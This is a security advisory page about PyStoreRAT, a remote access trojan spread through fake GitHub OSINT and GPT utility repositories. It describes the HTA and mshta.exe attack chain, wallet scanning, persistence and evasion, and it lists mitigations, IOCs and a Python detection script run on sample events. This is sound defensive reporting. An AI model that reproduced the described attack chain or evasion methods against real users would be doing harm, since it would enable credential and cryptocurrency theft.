
Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads

Published:

12 December 2025 at 18:50:00

Alert date:

12 December 2025 at 20:01:07

Source:

thehackernews.com


Cybersecurity researchers have identified a new campaign using fake GitHub-hosted Python repositories to distribute PyStoreRAT, a previously undocumented JavaScript-based Remote Access Trojan. The malicious repositories are disguised as development utilities or OSINT tools and contain minimal code that silently downloads and executes remote HTA files. This represents an active supply chain attack targeting developers and security researchers who might download these seemingly legitimate tools from GitHub.

Technical details

PyStoreRAT is a modular, multi-stage JavaScript-based Remote Access Trojan distributed through GitHub repositories containing Python/JavaScript loader stubs. The malware uses fake OSINT tools, DeFi bots, GPT wrappers, and security utilities as lures to target analysts and developers. Attack chain: the loader stub downloads a remote HTA file → the file is executed via mshta.exe → PyStoreRAT is delivered → the Rhadamanthys stealer is deployed. The malware can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. It establishes persistence via a scheduled task disguised as an NVIDIA update, profiles the system, checks for admin privileges, scans for cryptocurrency wallets (Ledger Live, Trezor, Exodus, Atomic, Guarda, BitBox02), and implements evasion techniques against CrowdStrike Falcon and Cybereason/ReasonLabs detection.

Mitigation steps:

Monitor for mshta.exe execution patterns, especially when spawned by cmd.exe or executed directly after antivirus detection checks. Watch for scheduled tasks masquerading as legitimate software updates. Implement detection for HTA file downloads and execution. Monitor GitHub repositories with inflated star/fork metrics and minimal functionality. Be cautious of OSINT tools, DeFi bots, and GPT utilities from new or dormant GitHub accounts. Implement behavioral analysis for cryptocurrency wallet file scanning activities.
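As an added example that is not part of the advisory or the report it summarises, the two detection rules above (mshta.exe spawned by cmd.exe or running an HTA, and a scheduled task masquerading as a vendor update) applied to constructed sample telemetry; the event field names are an assumption modelled on Sysmon/EDR process-creation and scheduled-task events.

```python
# Added example, not code from the advisory or the report it summarises: applies the
# detection guidance above to constructed sample telemetry. The field names (type,
# parent, image, cmdline, name, action) are an assumption modelled on Sysmon/EDR events.
import re

# Constructed sample events; paths and URLs are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "http://example.invalid/stage2.hta"'},
    {"type": "process", "parent": r"C:\Tools\osint-helper\run.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\dev\Downloads\readme.hta"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"type": "schtask", "name": r"\NVIDIA App SelfUpdate",
     "action": r"C:\Users\dev\AppData\Roaming\nvupd\pnm2png.exe"},
    {"type": "schtask", "name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "action": r"%windir%\system32\defrag.exe"},
]
# Task names that claim to be a vendor updater (the NVIDIA lure is the one named above).
VENDOR_UPDATE_RE = re.compile(r"(nvidia|microsoft|adobe|google).*update", re.I)
# Locations a genuine vendor updater normally runs from; user-writable paths are not here.
TRUSTED_PREFIXES = (r"c:\program files", r"c:\windows", "%windir%", "%programfiles%")

def suspicious_mshta(ev):
    """Rule 1: mshta.exe spawned by cmd.exe, or handed a URL or .hta file to run."""
    if ev.get("type") != "process" or not ev["image"].lower().endswith("mshta.exe"):
        return None
    reasons = []
    if ev["parent"].lower().endswith("cmd.exe"):
        reasons.append("spawned by cmd.exe")
    if re.search(r"https?://", ev["cmdline"], re.I):
        reasons.append("remote HTA download")
    elif re.search(r"\.hta\b", ev["cmdline"], re.I):
        reasons.append("local HTA execution")
    return "mshta.exe: " + ", ".join(reasons) if reasons else None

def masquerading_task(ev):
    """Rule 2: task named like a vendor update whose action lives outside trusted dirs."""
    if ev.get("type") != "schtask" or not VENDOR_UPDATE_RE.search(ev["name"]):
        return None
    if ev["action"].lower().startswith(TRUSTED_PREFIXES):
        return None
    return f"scheduled task {ev['name']!r} runs from untrusted path {ev['action']}"

def triage(events):
    """Return (event index, reason) for every event that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        reason = suspicious_mshta(ev) or masquerading_task(ev)
        if reason:
            hits.append((i, reason))
    return hits
```

Running `triage(SAMPLE_EVENTS)` flags the cmd.exe-launched remote HTA, the local HTA execution and the fake NVIDIA task, while the notepad and Defrag events pass.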

Affected products:

GitHub repositories
Python applications
JavaScript applications
Windows systems
Ledger Live wallet
Trezor wallet
Exodus wallet
Atomic wallet
Guarda wallet
BitBox02 wallet

IOCs:

mshta.exe execution
cmd.exe spawning mshta.exe
Scheduled task disguised as NVIDIA app self-update
pnm2png.exe
zlib1.dll
qt.conf
api.bilibili[.]com/x/report/click/now
Russian-language artifacts in code
HTA file downloads
Falcon string checks
Reason string checks

This article was created with the assistance of AI technology by Perceptive.

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

This website displays information obtained from external sources; Perceptive accepts no responsibility for the accuracy, completeness or timeliness of this information.
